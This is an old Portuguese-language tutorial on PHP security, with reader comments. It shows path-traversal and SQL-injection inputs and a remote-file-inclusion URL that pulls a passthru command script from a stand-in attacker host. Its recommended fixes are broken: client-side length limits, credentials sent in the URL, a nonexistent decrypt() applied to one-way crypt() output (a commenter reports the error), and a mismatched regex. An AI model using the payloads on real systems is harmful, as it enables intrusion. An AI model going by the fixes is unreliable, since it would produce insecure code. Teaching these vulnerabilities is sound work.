+6

Segurança em códigos PHP

criado por Jacques E. Winand em 19/08/2002 9:04am
A flexibilidade do PHP é que ele é uma ferramenta útil ao desenvolvimento de sistemas para internet, mas esta mesma flexibilidade pode ser usada de forma inadequada por usuários mal intencionados e proporcionar vulnerabilidades no servidor.

É fundamental restringir ao máximo a visualização das informações que trafegam pelos cabeçalhos HTTP, e certificar-se de que estas sejam postadas de um lado e recebidas de outro dentro de critérios definidos pelo programador. A má utilização das funções include(), require() e fopen() além da configuração das variáves globais no servidor é fundamental para manter um nível de segurança adequado.

Analizamos o seguinte exemplo:

Um programador desprevinido se utiliza do método de fast templates para mostrar conteúdo dinâmico na página, a cada link clicado a função include é chamada para mostrar novo conteúdo na página, a função include recebe da variável $link qual será este conteúdo, passando o mouse pelo link em questão vemos:

http://exemplo.com.br/exemplo.php?link=faleconosco.html

Neste caso (o que já vi por aí na web), devemos considerar o seguinte:

- Foi verificado a extensão do arquivo antes de passar o valor de $link para a função include?
- Os diretórios transversais são permitidos?
- É permitido arquivos remotos?

Se a resposta é não para apenas uma destas perguntas este servidor está a prestes a ser invadido.

Considere o seguinte:

http://exemplo.com.br/exemplo.php?link=../../../etc/passwd

E pronto, todas as senhas do servidor são públicas.

http://exemplo.com.br/exemplo.php?link=paghacker.com.br/exec.php

Onde exec.php contém:

<?php
passthru('id');
passthru('ls -l /etc');
passthru('ping -c l paghacker.com.br');
passthru('echo Você foi hackeado | mail root');
?>

Seu /etc é público ....

Acho que deu para ter uma idéia do que pode ser feito se utilizando desta vulnerabilidade.

Outra vulnerabilidade muito explorada são telas de login tipo usuário e senha, em muitas páginas já encontrei aqueles que incluem as variáveis diretamente a uma string sql, o que torna o login numa piada. Examine o seguinte exemplo:

<input type=text name=login>
<input type=password name=senha>

Isso gera as variáveis $login e $senha. Na página seguinte encontramos:

<?php
$sql = "SELECT * FROM users WHERE user=$login AND pass=$senha";
?>

Perfeito, está pronta a ser invadido, realize se o usuário digitar
OR "1=1" no login e senha, teremos:

<?php
$sql = "SELECT * FROM users WHERE user= OR '1=1' AND pass= OR '1=1'";
?>

Ou seja, $user = a nada OR 1=1 -->passou
$senha = a nada OR 1=1 -->passou
e pode-se fazer muito mais....

E o usuário está conectado ao sistema. Pode parecer ridículo mas o número de páginas em que estas falhas podem ser encontradas são inúmeras pois tem a impressão de que a segurança está apenas a cargo do adminitrador de rede, é óbvio que um servidor bem configurado evita muitas destas vulnerabilidades, mas não dá para confiar.

Para diminiur a vulnerabilidade ou evitar que invasões ridículas como estas aconteçam podemos nos utilizar de pequenos cuidados no código da tela de login por exemplo:

<input type=text name=login maxsize=5>
<input type=password name=senha maxsize=5>

Só isto já ajuda bastante pra começar, o invasor não poderá digitar o que quiser para login, determine limite para seus usuários. Isso é o básico, além disto é preciso usar criptografia para passagem de variáveis, abaixo seguem alguns exemplos:

Este arquivo é o login.php

<?php
if (!$flag) {
?>
   <form name="login" action="login.php">
    <input type="text" name="login" maxsize="5">
    <input type="password" name="senha" maxsize="5">
    <input type="hidden" name="flag" value="1">
   </form>
<?php
} else {
    $log = crypt(strtoupper($login), "d19"); 
    $snh = crypt(strtoupper($senha), "b8"); 
?>
<form name="autentica" action="autentica.php?l=<?php echo $log; ?>&s=<?php echo $snh; ?>" method="POST">
</form>
<script language="javascript">
  autentica.submit();
</script>
<?
}
?>

Do outro lado no autentica.php:

<?php
$login = decrypt(strtoupper($log), "d19"); 
$senha = decrypt(strtoupper($snh), "b8");
?>

Esta etapa permite o sigilo das informações que trafegam pela Internet, e dificulta um pouco mais a tentava de logins não permitidos. Mas o essencial é a utilização de expressões regulares que verificam a consistencia destes informações, podemos nos utilizar delas para verificarmos a inserção de comandos SQL nas variáveis, verificar extensões antes de submetelas a includes, requires e fopens. As expressões regulares podem também verificar um contexto pre-definido para senhas por exemplo, mas para tanto é preciso que você defina o padrão de senha e gere as mesmas dinamicamente para seu usuário.

Vejamos um exemplo para nosso caso:

Ainda no autentica.php, abaixo da desemcriptação verificamos a consistencia das variáveis recebidas.

<?php
$check1 = 0;
$check2 = 0;

if (ereg("^[a-z]+\.@", $login)) {
    $check1 = 1;
} else {
    echo ("Vai hackear outro site !");
}

if (ereg("[0-9]{5}", $senha)) {
    $check2 = 1;
} else {
    echo ("Vai hackear outro site !");
}

if ($check1 == 1 AND check2 == 1) {
    //submeta os valores
}  
?>

Sendo que meus login tem como padrão terminar com @ e minhas senhas são sempre numéricas de 5 dígitos.

E as variáveis estão prontas para serem incluídas na string SQL.

Espero ter aberto os olhos dos iniciantes na codificação PHP, para que cada vez mais a linguagem se torne sinônimo de eficiência, versatilidade e segurança quando utilizada para aplicações de qualquer porte, futuramente publicarei novo artigo mais prático mostrando vários exemplos.

Até mais,
Jacques E. W.

Comentários:

Mostrando 1 - 10 de 30 comentários
Quanto às senhas de login, basta utilizar uma função

$login = addslashes($_REQUEST['login']);
$senha = addslashes($_REQUEST['senha']);

antes de utilizar na consulta

há outros métodos que podem ser utilizados tb...

26/09/2008 1:05pm (~8 anos atrás)

Crap ........... :D
17/07/2007 11:04am (~9 anos atrás)

Muito bom o artigo, obrigado pela contribuição!
16/10/2006 5:28am (~10 anos atrás)

putz.. mto bom saber isso!!
show!
abraço
06/06/2006 10:21pm (~10 anos atrás)

jaime disse:
Caramba meu....só com esse artigo que fui identificar a variedade de falhas que deixo em meu código....valeu galera...e Publiquem mais artigos como esse!!
abraço
24/10/2005 10:42am (~11 anos atrás)

Show de bola!
11/07/2005 1:07pm (~11 anos atrás)

rui paiva disse:
Muito legal esse artigo de segurança.
K-19
26/06/2005 9:04am (~11 anos atrás)

Cara... vc mandou muito bem !!!
Sempre essas questões de segurança nos pegam desprevinidos...
26/03/2003 6:45am (~13 anos atrás)

Jacques ñ entendi o login.php como valido a senha se ñ posso utilizar <input type=submit value="envia">?
outro problema tenho o php 4.1.0 instalado tá dando esse erro Fatal error: Call to undefined function: decrypt()
24/02/2003 10:48pm (~13 anos atrás)

Jacques
Do jeito que está o codigo do arquivo login.php nada acontece.
maxlength=5. Se incluo o:
<input type=submit value="envia">
O código vai ficar duas vezes mais inseguro, primeiro manda login e senha sem proteção e depois manda os dados encriptados, onde está a vantagem, você poderia explicar?
29/01/2003 7:34am (~14 anos atrás)

Novo Comentário:

(Você pode usar tags como <b>, <i> ou <code>. URLs serão convertidas para links automaticamente.)